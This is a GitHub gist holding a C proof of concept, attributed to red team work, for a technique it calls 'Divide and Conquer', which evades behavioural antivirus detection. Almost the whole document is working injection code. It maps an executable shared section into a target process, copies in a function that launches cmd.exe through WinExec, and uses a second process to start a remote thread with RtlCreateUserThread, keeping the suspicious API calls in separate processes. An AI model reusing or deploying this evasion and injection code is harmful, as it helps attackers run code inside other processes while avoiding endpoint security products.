Skip to content

Instantly share code, notes, and snippets.

@akpotter

akpotter/divide_and_conquer.c

Forked from theevilbit/divide_and_conquer.c
Created January 19, 2021 04:08
Show Gist options
  • Save akpotter/f45d8cf16b8b4972bb8fd8fbde3c87a0 to your computer and use it in GitHub Desktop.
Save akpotter/f45d8cf16b8b4972bb8fd8fbde3c87a0 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @theevilbit theevilbit created this gist Jan 17, 2021.
    150 changes: 150 additions & 0 deletions divide_and_conquer.c
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,150 @@
    /*
    This is a POC for a generic technique I called internally on our red team assessment "Divide and Conquer", which can be used to bypass behavioral based NextGen AV detection. It works by splitting malicious actions and API calls into distinct processes.
    */

    #include <stdio.h>
    #include <tchar.h>

    #include <windows.h>
    #include "Commctrl.h"
    #include <string>
    #include <iostream>
    #include <tlhelp32.h>
    #include <strsafe.h>
    #pragma comment(lib, "ntdll")

    typedef struct _LSA_UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, * PUNICODE_STRING;
    typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
    typedef struct _CLIENT_ID { PVOID UniqueProcess; PVOID UniqueThread; } CLIENT_ID, * PCLIENT_ID;
    using myNtCreateSection = NTSTATUS(NTAPI*)(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL);
    using myNtMapViewOfSection = NTSTATUS(NTAPI*)(HANDLE SectionHandle, HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect);
    using myRtlCreateUserThread = NTSTATUS(NTAPI*)(IN HANDLE ProcessHandle, IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL, IN BOOLEAN CreateSuspended, IN ULONG StackZeroBits, IN OUT PULONG StackReserved, IN OUT PULONG StackCommit, IN PVOID StartAddress, IN PVOID StartParameter OPTIONAL, OUT PHANDLE ThreadHandle, OUT PCLIENT_ID ClientID);

    //this is a definition for WinExec, taken from MSDN
    //required so it can be called from the injected function
    typedef int(WINAPI* myWinExec)(
    LPCSTR lpCmdLine,
    UINT uCmdShow
    );

    //all data parameters that will be needed by the injected function, e.g.: function names, parameters, etc...
    struct PARAMETERS {
    SIZE_T FuncInj;
    char command[256];
    };

    //this is the to be injected function
    int ToBeInjected(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam, UINT_PTR uIdSubclass, DWORD_PTR dwRefData)
    {
    #ifdef _WIN64
    PARAMETERS* myparam = (PARAMETERS*)0x0000440000000000; //parameters will be placed in fixed location
    #endif
    #ifdef _X86_
    PARAMETERS* myparam = (PARAMETERS*)0x44000000; //parameters will be placed in fixed location
    #endif
    myWinExec WE = (myWinExec)myparam->FuncInj; //we get the WinExec address and convert it to a function
    WE(myparam->command, 1); //call the function
    return 0; //need to return something
    }

    DWORD Useless() { //this is useless to our injection but is needed to calculate the length of MyFunc
    return 0;
    }

    //this is a structure to store injection related info, PID and function address
    typedef struct INJECTINFO
    {
    DWORD pid;
    LPVOID address;
    } *LPINJECTINFO;

    void ErrorExit(LPTSTR lpszFunction)
    {
    // Retrieve the system error message for the last-error code
    LPVOID lpMsgBuf;
    DWORD dw = GetLastError();

    FormatMessage(
    FORMAT_MESSAGE_ALLOCATE_BUFFER |
    FORMAT_MESSAGE_FROM_SYSTEM |
    FORMAT_MESSAGE_IGNORE_INSERTS,
    NULL,
    dw,
    MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
    (LPTSTR)& lpMsgBuf,
    0, NULL);

    // Display the error message and exit the process
    wprintf(L"[-] %s failed with error 0x%x: %s", lpszFunction, dw, (wchar_t*)lpMsgBuf);

    LocalFree(lpMsgBuf);
    ExitProcess(dw);
    }

    int wmain(int argc, wchar_t** argv)
    {
    if (argc < 3)
    {
    printf("Usage: inject.exe [process name] [case] [address]\n");
    return 1;
    }

    DWORD pid = _wtoi(argv[1]);
    printf("[+] PID is: %d,0x%x\n", (UINT)pid, (UINT)pid);
    int step = _wtoi(argv[2]);

    myNtCreateSection fNtCreateSection = (myNtCreateSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtCreateSection"));
    myNtMapViewOfSection fNtMapViewOfSection = (myNtMapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtMapViewOfSection"));
    myRtlCreateUserThread fRtlCreateUserThread = (myRtlCreateUserThread)(GetProcAddress(GetModuleHandleA("ntdll"), "RtlCreateUserThread"));
    LARGE_INTEGER sectionSize = { 4096 };
    SIZE_T size = 4096;
    HANDLE sectionHandle = NULL;
    PVOID localSectionAddress = NULL, remoteSectionAddress = (PVOID)0x0000440000000000;
    PVOID sc_address;
    HANDLE targetHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid);

    if (step == 1)
    {
    // create a memory section
    fNtCreateSection(&sectionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, NULL, (PLARGE_INTEGER)& sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);

    // create a view of the memory section in the local process
    fNtMapViewOfSection(sectionHandle, GetCurrentProcess(), &localSectionAddress, NULL, NULL, NULL, &size, 2, NULL, PAGE_READWRITE);

    // create a view of the memory section in the target process
    fNtMapViewOfSection(sectionHandle, targetHandle, &remoteSectionAddress, NULL, NULL, NULL, &size, 2, NULL, PAGE_EXECUTE_READ);


    const char* command = "cmd.exe";
    PARAMETERS data;
    data.FuncInj = (SIZE_T)GetProcAddress(GetModuleHandleA("kernel32.dll"), "WinExec");
    strcpy_s(data.command, command);

    //calculate our inejtec function size
    SIZE_T size_myFunc = (SIZE_T)Useless - (SIZE_T)ToBeInjected;



    // copy shellcode to the local view, which will get reflected in the target process's mapped view
    memcpy(localSectionAddress, &data, sizeof(data));

    sc_address = (PVOID)((SIZE_T)localSectionAddress + sizeof(data));
    memcpy(sc_address, (LPVOID)(ToBeInjected), size_myFunc);
    sc_address = (PVOID)((SIZE_T)remoteSectionAddress + sizeof(data));
    printf("[+] Allocated memory address in target process is: %I64d\n", (SIZE_T)sc_address);
    printf("[+] Allocated memory address in target process is: 0x%Ix\n", (SIZE_T)sc_address);
    char tText[1024];
    wsprintfA(tText, "cmd.exe /c CreateSectionInjection.exe %d 2 %I64d", pid, (SIZE_T)sc_address);

    WinExec(tText, 1);
    }
    if (step == 2)
    {
    sc_address = (LPVOID)_wtoi64(argv[3]);
    printf("[+] memory address in target process is: 0x%Ix\n", (SIZE_T)sc_address);

    HANDLE targetThreadHandle = NULL;
    fRtlCreateUserThread(targetHandle, NULL, FALSE, 0, 0, 0, sc_address, NULL, &targetThreadHandle, NULL);
    }
    return 0;
    }